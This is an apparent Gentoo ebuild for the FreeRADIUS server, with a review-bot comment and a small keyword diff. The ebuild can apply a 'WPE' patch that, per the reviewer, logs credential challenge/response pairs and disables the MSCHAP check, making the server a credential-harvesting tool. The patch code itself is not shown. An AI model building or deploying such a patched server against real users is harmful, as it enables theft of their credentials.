RDEPEND="!net-dialup/cistronradius
!net-dialup/gnuradius
sys-devel/libtool
dev-lang/perl
sys-libs/gdbm
python? ( >=dev-lang/python-2.4 )
readline? ( sys-libs/readline )
pcap? ( net-libs/libpcap )
mysql? ( virtual/mysql )
postgres? ( dev-db/postgresql-server )
firebird? ( dev-db/firebird )
pam? ( sys-libs/pam )
ssl? ( dev-libs/openssl )
ldap? ( net-nds/openldap )
kerberos? ( virtual/krb5 )
ruby? ( dev-lang/ruby:1.8 )
sqlite? ( dev-db/sqlite:3 )
odbc? ( dev-db/unixODBC )
iodbc? ( dev-db/libiodbc )
oracle? ( dev-db/oracle-instantclient-basic )"
DEPEND="${RDEPEND}"
REQUIRED_USE="bindist? ( !firebird )"
S="${WORKDIR}/${MY_P}"
pkg_setup() {
enewgroup radius
enewuser radius -1 -1 /var/log/radius radius
}
src_prepare() {
epatch "${WORKDIR}"/patches/*.patch
if use wpe; then
epatch "${FILESDIR}/${PN}-2.1.12-wpe.patch"
cp "${FILESDIR}"/clients_wpe.conf raddb/clients.conf || die "failed to copy config files"
cp "${FILESDIR}"/eap_wpe.conf raddb/eap.conf || die "failed to copy config files"
cp "${FILESDIR}"/users_wpe raddb/users || die "failed to copy config files"
fi
# most of the configuration options do not appear as ./configure
# switches. Instead it identifies the directories that are available
# and run through them. These might check for the presence of
# various libraries, in which case they are not built. To avoid
# automagic dependencies, we just remove all the modules that we're
# not interested in using.
use ssl || rm -r src/modules/rlm_eap/types/rlm_eap_{tls,ttls,peap}
use ldap || rm -r src/modules/rlm_ldap
use kerberos || rm -r src/modules/rlm_krb5
use pam || rm -r src/modules/rlm_pam
use python || rm -r src/modules/rlm_python
use ruby || rm -r src/modules/rlm_ruby
# these are all things we don't have in portage/I don't want to deal
# with myself
rm -r src/modules/rlm_eap/types/rlm_eap_tnc # requires TNCS library
rm -r src/modules/rlm_eap/types/rlm_eap_ikev2 # requires libeap-ikev2
rm -r src/modules/rlm_opendirectory # requires some membership.h
rm -r src/modules/rlm_redis{,who} # requires redis
rm -r src/modules/rlm_sql/drivers/rlm_sql_{db2,freetds,sybase}
# sql drivers that are not part of experimental are loaded from a
# file, so we have to remove them from the file itself when we
# remove them.
usesqldriver() {
local flag=$1
local driver=rlm_sql_${2:-${flag}}
if ! use ${flag}; then
rm -r src/modules/rlm_sql/drivers/${driver} || die
sed -i -e /${driver}/d src/modules/rlm_sql/stable || die
fi
}
usesqldriver mysql
usesqldriver postgres postgresql
usesqldriver firebird
usesqldriver iodbc
usesqldriver odbc unixodbc
usesqldriver oracle
usesqldriver sqlite
# remove bundled ltdl to avoid conflicts
rm -r libltdl
eautoreconf
}
src_configure() {
# fix bug #77613
if has_version app-crypt/heimdal; then
myconf="${myconf} --enable-heimdal-krb5"
fi
use readline || export ac_cv_lib_readline=no
use pcap || export ac_cv_lib_pcap_pcap_open_live=no
# do not try to enable static with static-libs; upstream is a
# massacre of libtool best practices so you also have to make sure
# to --enable-shared explicitly.
econf \
--enable-shared --disable-static \
--disable-ltdl-install \
--with-system-libtool \
--with-system-libltdl \
--with-ascend-binary \
--with-udpfromto \
--with-dhcp \
--with-iodbc-include-dir=/usr/include/iodbc \
--with-experimental-modules \
--with-docdir=/usr/share/doc/${PF} \
--with-logdir=/var/log/radius \
$(use_enable debug developer) \
$(use_with ldap edir) \
$(use_with ssl openssl)
}
src_install() {
dodir /etc
diropts -m0750 -o root -g radius
dodir /etc/raddb
diropts -m0750 -o radius -g radius
dodir /var/log/radius
keepdir /var/log/radius/radacct
diropts
emake R="${D}" install
chown -R root:radius "${D}"/etc/raddb
sed -i -e '/run_dir =/s:=.*:=/var/run/radiusd:' \
"${D}"/etc/raddb/radiusd.conf
pamd_mimic_system radiusd auth account password session
dodoc CREDITS
rm "${D}/usr/sbin/rc.radiusd"
newinitd "${FILESDIR}/radius.init-r3" radiusd
newconfd "${FILESDIR}/radius.conf-r3" radiusd
}
pkg_config() {
if use ssl; then
cd "${ROOT}"/etc/raddb/certs
./bootstrap
fi
}
pkg_postinst() {
elog "Users are no longer read from /etc/raddb/radiusd.conf. Please"
elog "configure them in /etc/conf.d/radius instead."
elog "Also make sure that if you change the pidfile in /etc/raddb/radiusd.conf"
elog "you change the pidfile definition in /etc/conf.d/radius as well."
if use ssl; then
ewarn "You have to run \`emerge --config =${CATEGORY}/${PF}\` to be able"
ewarn "to start the radiusd service."
fi
}
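Review bot: `+wpe` in IUSE turns the WPE patch on by default for a package keyworded stable on amd64 and x86, and src_prepare then overwrites raddb/clients.conf, raddb/eap.conf and raddb/users with the WPE variants. Judging by the older WPE patch visible on this page (log_wpe writes usernames with challenge/response pairs, and the memcmp check in do_mschap is commented out), a default build would not behave as a real authentication server; the 2.1.12 patch applied here is not shown, so this should be confirmed. I would either drop the `+` or add to pkg_postinst `use wpe && ewarn "Built with the WPE patch: authentication checks are altered and credentials are logged; not for production use."`. Separately, src_configure sets `myconf` for heimdal but never passes `${myconf}` to econf, so `--enable-heimdal-krb5` is silently lost.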


@ -1 +1 @@
~net-dialup/freeradius-2.2.0
#~net-dialup/freeradius-2.2.0